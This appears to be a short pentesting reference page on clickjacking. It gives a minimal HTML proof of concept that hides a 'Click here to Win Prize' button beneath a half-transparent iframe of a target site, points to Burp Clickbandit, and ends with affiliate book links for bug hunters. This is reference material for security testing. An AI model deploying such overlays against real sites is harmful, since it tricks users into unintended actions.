Clickjacking

What is Clickjacking | Attack Example | X-Frame-Options Pros & Cons | ImpervaLearning Center

PoC

Make clickjacking PoC | Reporting clickjacking | clickjacker.ioClickjacker

<!DOCTYPE html>
<html>
<head>
<title>Clickjacking PoC</title>
</head>
<body>
<input type=button value="Click here to Win Prize" style="z-index:-1;left:1200px;position:relative;top:800px;"/>
<iframe src="http://target/" width=100% height=100% style=”opacity: 0.5;”></iframe>
</body>
</html>

Or with Burp Clickbandit

Using Burp to find Clickjacking Vulnerabilities

Burp Clickbandit: A JavaScript based clickjacking PoC generatorPortSwigger Research

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

PreviousWeb Cache NextTabnabbing

Last updated 2 months ago